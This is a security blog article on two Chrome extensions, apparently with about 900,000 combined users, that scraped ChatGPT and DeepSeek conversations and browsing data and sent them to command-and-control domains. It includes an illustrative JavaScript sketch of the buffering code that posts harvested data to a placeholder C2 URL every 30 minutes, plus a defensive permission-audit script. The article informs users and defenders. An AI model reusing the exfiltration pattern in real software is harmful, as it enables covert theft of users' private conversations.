Jan 26, 2026 · 5 min read
These Chrome Extensions Were Stealing Your ChatGPT Conversations
Security researchers discovered two popular browser extensions secretly exfiltrating AI chatbot conversations to remote servers every 30 minutes. The extensions had over 900,000 combined users.
The Extensions That Harvested Your AI Chats
Two malicious Chrome extensions were discovered on the Chrome Web Store, masquerading as AI productivity tools while secretly siphoning off everything users typed into ChatGPT and DeepSeek:
- Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI — 600,000 users
- AI Sidebar with Deepseek, ChatGPT, Claude, and more — 300,000 users
The extensions functioned as advertised, providing AI chat features to users. But behind the scenes, they were running a parallel operation: extracting conversation content from the DOM, storing it locally, and transmitting it to command-and-control (C2) servers every 30 minutes.
How the Attack Worked
Security researcher Moshe Siman Tov Bustan from OX Security discovered the malicious behavior and documented the technique, which he termed "Prompt Poaching." The extensions used a deceptively simple approach.
When installed, the extensions requested permission to collect "anonymous, non-identifiable analytics data." Users who clicked through the permission prompt unknowingly authorized complete access to their AI conversations. The extensions then:
- Monitored tabs for ChatGPT and DeepSeek sessions
- Extracted conversation content directly from page elements
- Captured all Chrome tab URLs and browsing activity
- Stored data locally before batch transmission to C2 servers
- Transmitted harvested data every 30 minutes to domains including chatsaigpt[.]com and deepaichats[.]com
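The store-then-batch behavior described above can be sketched as a small buffer that accumulates harvested snippets and periodically flushes them to a remote endpoint. This is a minimal illustration of the pattern the researchers describe, not the extensions' actual code; the class name and transport callback are hypothetical.

```javascript
// Sketch of the batch-exfiltration pattern: harvested items accumulate
// in a local buffer, and a periodic timer flushes them in one request.
// All names here are illustrative, not taken from the real extensions.
class ExfilBuffer {
  constructor(send) {
    this.queue = [];
    this.send = send; // e.g. batch => fetch(C2_URL, { method: 'POST', body: JSON.stringify(batch) })
  }

  // Called whenever new conversation text is scraped from the page.
  record(item) {
    this.queue.push({ ts: Date.now(), item });
  }

  // Drains the buffer and hands the whole batch to the transport.
  // Returns the number of items sent.
  flush() {
    if (this.queue.length === 0) return 0;
    const batch = this.queue.splice(0);
    this.send(batch);
    return batch.length;
  }
}
```

In a real extension, the flush would be driven by a periodic timer in the background script (for example, `chrome.alarms.create('sync', { periodInMinutes: 30 })` matches the 30-minute cadence observed here), which is why the theft produced only occasional network traffic rather than a request per keystroke.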
What Data Was Stolen
The stolen information went far beyond simple browsing history. Compromised data included:
- Complete AI conversations: Every prompt and response from ChatGPT and DeepSeek sessions
- Web browsing activity: All URLs visited across Chrome tabs
- Search queries: What users were searching for
- Internal corporate URLs: Company intranet and internal tool addresses
The implications are significant. Many users share sensitive information with AI chatbots: code snippets, business strategies, personal details, confidential documents, even credentials. All of this was being harvested and sent to attacker-controlled servers.
The Infrastructure Behind the Attack
The attackers demonstrated sophistication in building a convincing facade. They used Lovable, an AI web development platform, to generate legitimate-looking privacy policy pages hosted at chataigpt[.]pro and chatgptsidebar[.]pro. These pages made the extensions appear trustworthy to users who bothered to check.
The command-and-control infrastructure used domain names designed to blend in with legitimate AI services. Users who noticed network traffic to "chatsaigpt.com" might assume it was related to the ChatGPT functionality they had installed.
Why This Attack Matters
This attack represents a new frontier in data theft. As AI assistants become integrated into daily workflows, they become repositories for sensitive information that users might not share elsewhere. Conversations with AI chatbots often contain:
- Proprietary code and technical documentation
- Business plans and strategic thinking
- Personal health questions and concerns
- Financial information and investment strategies
- Legal questions revealing sensitive situations
The stolen data could be used for corporate espionage, targeted phishing campaigns, identity theft, or sold on underground forums. An attacker with access to months of AI conversations has a detailed profile of the victim's work, interests, and vulnerabilities.
Protecting Yourself from Malicious Extensions
If you installed either of these extensions, remove them immediately and assume any conversations you had with AI chatbots while they were installed have been compromised. Change any passwords or credentials you may have shared in those conversations.
To reduce your risk going forward:
- Audit your extensions: Go to chrome://extensions and review what you have installed. Remove anything you don't actively use.
- Check permissions: Be suspicious of extensions requesting broad permissions like "Read and change all your data on all websites."
- Prefer official tools: Use ChatGPT and DeepSeek through their official websites or apps rather than third-party extensions.
- Review before installing: Check the developer's history, read recent reviews, and look for red flags like vague privacy policies.
- Treat AI chats as non-private: Even without malicious extensions, AI providers may retain and train on your conversations. Never share credentials, API keys, or highly sensitive information in AI chats.
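The permission-audit step can be partly automated offline. Every installed extension ships a `manifest.json` declaring its permissions, so a short script can flag manifests that request broad host access of the kind mentioned above. This is a hedged sketch: the `broadPermissions` helper and the pattern list are my own illustration, and the on-disk location of extension manifests varies by OS and Chrome profile.

```javascript
// Flags manifest permission patterns that grant access to every site.
// The list covers the common "all hosts" match patterns; it is an
// illustrative starting point, not an exhaustive ruleset.
const BROAD = ['<all_urls>', '*://*/*', 'http://*/*', 'https://*/*'];

function broadPermissions(manifest) {
  // Manifest V2 put host patterns in `permissions`; Manifest V3 moved
  // them to `host_permissions`, so check both fields.
  const requested = [
    ...(manifest.permissions || []),
    ...(manifest.host_permissions || []),
  ];
  return requested.filter(p => BROAD.includes(p));
}

// Example: an extension asking only for `tabs` is far narrower than
// one asking for `<all_urls>`.
const suspicious = broadPermissions({
  permissions: ['tabs', 'storage'],
  host_permissions: ['<all_urls>'],
});
// suspicious -> ['<all_urls>']
```

To run this against your own profile, point it at each extension's `manifest.json` (on Linux, typically under `~/.config/google-chrome/Default/Extensions/`; paths differ on macOS and Windows). A broad permission is not proof of malice, since many legitimate tools need it, but it marks the extensions worth reviewing first.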
The Broader Extension Security Problem
This incident is part of a larger pattern. A Stanford University study found that over 346 million users installed "security-noteworthy extensions" over a three-year period—extensions containing malware, violating privacy policies, or harboring known vulnerabilities. Even more troubling: 42% of extensions with known vulnerabilities remained live and exploitable two years after disclosure.
The Chrome Web Store's review process catches many threats, but malicious actors continuously adapt. Extensions that pass initial review can later receive updates that introduce malicious functionality, or attackers may purchase legitimate extensions from their developers and then push malicious updates to the existing user base.
The safest approach is to minimize extension usage to only what you genuinely need, regularly audit what's installed, and maintain healthy skepticism about any extension requesting broad permissions.